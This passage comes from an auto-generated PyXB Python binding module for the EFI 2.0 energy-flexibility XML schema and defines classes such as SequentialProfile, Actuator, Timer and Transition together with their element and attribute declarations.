    __heatProbabilityProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatProbabilityProfile'), 'heatProbabilityProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2heatProbabilityProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 303, 4), )
    heatProbabilityProfile = property(__heatProbabilityProfile.value, __heatProbabilityProfile.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __electricityProfile.name() : __electricityProfile,
        __electricityProbabilityProfile.name() : __electricityProbabilityProfile,
        __gasProfile.name() : __gasProfile,
        __gasProbabilityProfile.name() : __gasProbabilityProfile,
        __heatProfile.name() : __heatProfile,
        __heatProbabilityProfile.name() : __heatProbabilityProfile
    })
    _AttributeMap.update({
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.ProfileContainer = ProfileContainer
Namespace.addCategoryObject('typeBinding', 'ProfileContainer', ProfileContainer)
# Complex type {http://www.flexiblepower.org/efi-2}CurtailmentProfileElement with content type EMPTY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class CurtailmentProfileElement (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}CurtailmentProfileElement with content type EMPTY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentProfileElement')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 336, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
    __duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CurtailmentProfileElement_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
    __duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 337, 2)
    __duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 337, 2)
    duration = property(__duration.value, __duration.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}value uses Python identifier value_
    # PyXB appends a trailing underscore ('value_') to avoid colliding with an existing
    # binding API name -- presumably the inherited value() accessor; TODO confirm.
    __value = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'value'), 'value_', '__httpwww_flexiblepower_orgefi_2_CurtailmentProfileElement_httpwww_flexiblepower_orgefi_2value', pyxb.binding.datatypes.double, required=True)
    __value._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 338, 2)
    __value._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 338, 2)
    value_ = property(__value.value, __value.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __duration.name() : __duration,
        __value.name() : __value
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.CurtailmentProfileElement = CurtailmentProfileElement
Namespace.addCategoryObject('typeBinding', 'CurtailmentProfileElement', CurtailmentProfileElement)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfile with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class SequentialProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}SequentialProfile with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 351, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}maxIntervalBefore uses Python identifier maxIntervalBefore
    __maxIntervalBefore = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'maxIntervalBefore'), 'maxIntervalBefore', '__httpwww_flexiblepower_orgefi_2_SequentialProfile_httpwww_flexiblepower_orgefi_2maxIntervalBefore', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 353, 3), )
    maxIntervalBefore = property(__maxIntervalBefore.value, __maxIntervalBefore.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}sequentialProfileAlternatives uses Python identifier sequentialProfileAlternatives
    __sequentialProfileAlternatives = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternatives'), 'sequentialProfileAlternatives', '__httpwww_flexiblepower_orgefi_2_SequentialProfile_httpwww_flexiblepower_orgefi_2sequentialProfileAlternatives', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 354, 3), )
    sequentialProfileAlternatives = property(__sequentialProfileAlternatives.value, __sequentialProfileAlternatives.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}sequenceNr uses Python identifier sequenceNr
    __sequenceNr = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'sequenceNr'), 'sequenceNr', '__httpwww_flexiblepower_orgefi_2_SequentialProfile_httpwww_flexiblepower_orgefi_2sequenceNr', pyxb.binding.datatypes.int, required=True)
    __sequenceNr._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 356, 2)
    __sequenceNr._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 356, 2)
    sequenceNr = property(__sequenceNr.value, __sequenceNr.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __maxIntervalBefore.name() : __maxIntervalBefore,
        __sequentialProfileAlternatives.name() : __sequentialProfileAlternatives
    })
    _AttributeMap.update({
        __sequenceNr.name() : __sequenceNr
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.SequentialProfile = SequentialProfile
Namespace.addCategoryObject('typeBinding', 'SequentialProfile', SequentialProfile)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileAlternatives with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class SequentialProfileAlternatives (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileAlternatives with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfileAlternatives')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 365, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}sequentialProfileAlternative uses Python identifier sequentialProfileAlternative
    # Fourth positional argument True => plural element (repeating child collection).
    __sequentialProfileAlternative = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternative'), 'sequentialProfileAlternative', '__httpwww_flexiblepower_orgefi_2_SequentialProfileAlternatives_httpwww_flexiblepower_orgefi_2sequentialProfileAlternative', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 367, 3), )
    sequentialProfileAlternative = property(__sequentialProfileAlternative.value, __sequentialProfileAlternative.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __sequentialProfileAlternative.name() : __sequentialProfileAlternative
    })
    _AttributeMap.update({
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.SequentialProfileAlternatives = SequentialProfileAlternatives
Namespace.addCategoryObject('typeBinding', 'SequentialProfileAlternatives', SequentialProfileAlternatives)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfiles with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class SequentialProfiles (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}SequentialProfiles with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfiles')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 370, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}sequentialProfile uses Python identifier sequentialProfile
    # Fourth positional argument True => plural element (repeating child collection).
    __sequentialProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfile'), 'sequentialProfile', '__httpwww_flexiblepower_orgefi_2_SequentialProfiles_httpwww_flexiblepower_orgefi_2sequentialProfile', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 372, 3), )
    sequentialProfile = property(__sequentialProfile.value, __sequentialProfile.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __sequentialProfile.name() : __sequentialProfile
    })
    _AttributeMap.update({
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.SequentialProfiles = SequentialProfiles
Namespace.addCategoryObject('typeBinding', 'SequentialProfiles', SequentialProfiles)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileInstruction with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class SequentialProfileInstruction (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileInstruction with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfileInstruction')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 387, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}sequenceNr uses Python identifier sequenceNr
    __sequenceNr = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequenceNr'), 'sequenceNr', '__httpwww_flexiblepower_orgefi_2_SequentialProfileInstruction_httpwww_flexiblepower_orgefi_2sequenceNr', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 389, 3), )
    sequenceNr = property(__sequenceNr.value, __sequenceNr.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}alternativeNr uses Python identifier alternativeNr
    __alternativeNr = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'alternativeNr'), 'alternativeNr', '__httpwww_flexiblepower_orgefi_2_SequentialProfileInstruction_httpwww_flexiblepower_orgefi_2alternativeNr', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 390, 3), )
    alternativeNr = property(__alternativeNr.value, __alternativeNr.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}startTime uses Python identifier startTime
    __startTime = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'startTime'), 'startTime', '__httpwww_flexiblepower_orgefi_2_SequentialProfileInstruction_httpwww_flexiblepower_orgefi_2startTime', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 391, 3), )
    startTime = property(__startTime.value, __startTime.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __sequenceNr.name() : __sequenceNr,
        __alternativeNr.name() : __alternativeNr,
        __startTime.name() : __startTime
    })
    _AttributeMap.update({
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.SequentialProfileInstruction = SequentialProfileInstruction
Namespace.addCategoryObject('typeBinding', 'SequentialProfileInstruction', SequentialProfileInstruction)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileInstructions with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class SequentialProfileInstructions (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileInstructions with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfileInstructions')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 394, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}sequentialProfileInstruction uses Python identifier sequentialProfileInstruction
    # Fourth positional argument True => plural element (repeating child collection).
    __sequentialProfileInstruction = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstruction'), 'sequentialProfileInstruction', '__httpwww_flexiblepower_orgefi_2_SequentialProfileInstructions_httpwww_flexiblepower_orgefi_2sequentialProfileInstruction', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 396, 3), )
    sequentialProfileInstruction = property(__sequentialProfileInstruction.value, __sequentialProfileInstruction.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __sequentialProfileInstruction.name() : __sequentialProfileInstruction
    })
    _AttributeMap.update({
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.SequentialProfileInstructions = SequentialProfileInstructions
Namespace.addCategoryObject('typeBinding', 'SequentialProfileInstructions', SequentialProfileInstructions)
# Complex type {http://www.flexiblepower.org/efi-2}Actuator with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class Actuator (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}Actuator with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Actuator')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 423, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}supportedCommodity uses Python identifier supportedCommodity
    # Fourth positional argument True => plural element (repeating child collection).
    __supportedCommodity = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodity'), 'supportedCommodity', '__httpwww_flexiblepower_orgefi_2_Actuator_httpwww_flexiblepower_orgefi_2supportedCommodity', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 425, 3), )
    supportedCommodity = property(__supportedCommodity.value, __supportedCommodity.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}id uses Python identifier id
    # Required int attribute; the property name 'id' mirrors the XSD attribute and
    # shadows the builtin id() only when accessed via the class/instance.
    __id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpwww_flexiblepower_orgefi_2_Actuator_httpwww_flexiblepower_orgefi_2id', pyxb.binding.datatypes.int, required=True)
    __id._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 427, 2)
    __id._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 427, 2)
    id = property(__id.value, __id.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}label uses Python identifier label
    # Optional string attribute (no required=True), unlike Timer.label which is required.
    __label = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'label'), 'label', '__httpwww_flexiblepower_orgefi_2_Actuator_httpwww_flexiblepower_orgefi_2label', pyxb.binding.datatypes.string)
    __label._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 428, 2)
    __label._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 428, 2)
    label = property(__label.value, __label.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __supportedCommodity.name() : __supportedCommodity
    })
    _AttributeMap.update({
        __id.name() : __id,
        __label.name() : __label
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.Actuator = Actuator
Namespace.addCategoryObject('typeBinding', 'Actuator', Actuator)
# Complex type {http://www.flexiblepower.org/efi-2}Actuators with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class Actuators (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}Actuators with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Actuators')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 430, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}actuator uses Python identifier actuator
    # Fourth positional argument True => plural element (repeating child collection).
    __actuator = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuator'), 'actuator', '__httpwww_flexiblepower_orgefi_2_Actuators_httpwww_flexiblepower_orgefi_2actuator', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 432, 3), )
    actuator = property(__actuator.value, __actuator.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __actuator.name() : __actuator
    })
    _AttributeMap.update({
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.Actuators = Actuators
Namespace.addCategoryObject('typeBinding', 'Actuators', Actuators)
# Complex type {http://www.flexiblepower.org/efi-2}Timer with content type EMPTY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class Timer (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}Timer with content type EMPTY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Timer')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 435, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # All three attributes are required per the schema.
    # Attribute {http://www.flexiblepower.org/efi-2}id uses Python identifier id
    # Property name 'id' mirrors the XSD attribute (shadows the builtin only via class/instance access).
    __id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpwww_flexiblepower_orgefi_2_Timer_httpwww_flexiblepower_orgefi_2id', pyxb.binding.datatypes.int, required=True)
    __id._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 436, 2)
    __id._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 436, 2)
    id = property(__id.value, __id.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}label uses Python identifier label
    __label = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'label'), 'label', '__httpwww_flexiblepower_orgefi_2_Timer_httpwww_flexiblepower_orgefi_2label', pyxb.binding.datatypes.string, required=True)
    __label._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 437, 2)
    __label._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 437, 2)
    label = property(__label.value, __label.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
    __duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_Timer_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
    __duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 438, 2)
    __duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 438, 2)
    duration = property(__duration.value, __duration.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __id.name() : __id,
        __label.name() : __label,
        __duration.name() : __duration
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.Timer = Timer
Namespace.addCategoryObject('typeBinding', 'Timer', Timer)
# Complex type {http://www.flexiblepower.org/efi-2}Timers with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class Timers (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}Timers with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Timers')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 440, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}timer uses Python identifier timer
    # Fourth positional argument True => plural element (repeating child collection).
    __timer = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timer'), 'timer', '__httpwww_flexiblepower_orgefi_2_Timers_httpwww_flexiblepower_orgefi_2timer', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 442, 3), )
    timer = property(__timer.value, __timer.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __timer.name() : __timer
    })
    _AttributeMap.update({
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.Timers = Timers
Namespace.addCategoryObject('typeBinding', 'Timers', Timers)
# Complex type {http://www.flexiblepower.org/efi-2}Transitions with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class Transitions (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}Transitions with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Transitions')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 445, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}transition uses Python identifier transition
    # Fourth positional argument True => plural element (repeating child collection).
    __transition = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'transition'), 'transition', '__httpwww_flexiblepower_orgefi_2_Transitions_httpwww_flexiblepower_orgefi_2transition', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 447, 3), )
    transition = property(__transition.value, __transition.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __transition.name() : __transition
    })
    _AttributeMap.update({
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.Transitions = Transitions
Namespace.addCategoryObject('typeBinding', 'Transitions', Transitions)
# Complex type {http://www.flexiblepower.org/efi-2}TimerReferences with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class TimerReferences (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}TimerReferences with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'TimerReferences')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 450, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}timerReference uses Python identifier timerReference
    # Fourth positional argument True => plural element (repeating child collection).
    __timerReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timerReference'), 'timerReference', '__httpwww_flexiblepower_orgefi_2_TimerReferences_httpwww_flexiblepower_orgefi_2timerReference', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 452, 3), )
    timerReference = property(__timerReference.value, __timerReference.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
        __timerReference.name() : __timerReference
    })
    _AttributeMap.update({
    })
# Expose the binding at module scope and make it resolvable by name in the namespace.
_module_typeBindings.TimerReferences = TimerReferences
Namespace.addCategoryObject('typeBinding', 'TimerReferences', TimerReferences)
# Complex type [anonymous] with content type EMPTY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class CTD_ANON_9 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type EMPTY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    # Anonymous type: no namespace-qualified name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 453, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}timerId uses Python identifier timerId
    # Required int reference to a Timer's id attribute -- presumably matched by value; verify against schema.
    __timerId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'timerId'), 'timerId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_9_httpwww_flexiblepower_orgefi_2timerId', pyxb.binding.datatypes.int, required=True)
    __timerId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 454, 5)
    __timerId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 454, 5)
    timerId = property(__timerId.value, __timerId.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __timerId.name() : __timerId
    })
# Expose the anonymous binding at module scope.
_module_typeBindings.CTD_ANON_9 = CTD_ANON_9
# Complex type {http://www.flexiblepower.org/efi-2}Transition with content type ELEMENT_ONLY
# PyXB-generated binding class — regenerate from the XSD rather than editing by hand.
class Transition (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}Transition with content type ELEMENT_ONLY"""
    # ELEMENT_ONLY content: child elements only, no mixed text content.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Transition')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 459, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}startTimers uses Python identifier startTimers
    # NOTE(review): the False positional flag appears to mark this element as
    # non-plural (single occurrence) — confirm against pyxb ElementDeclaration.
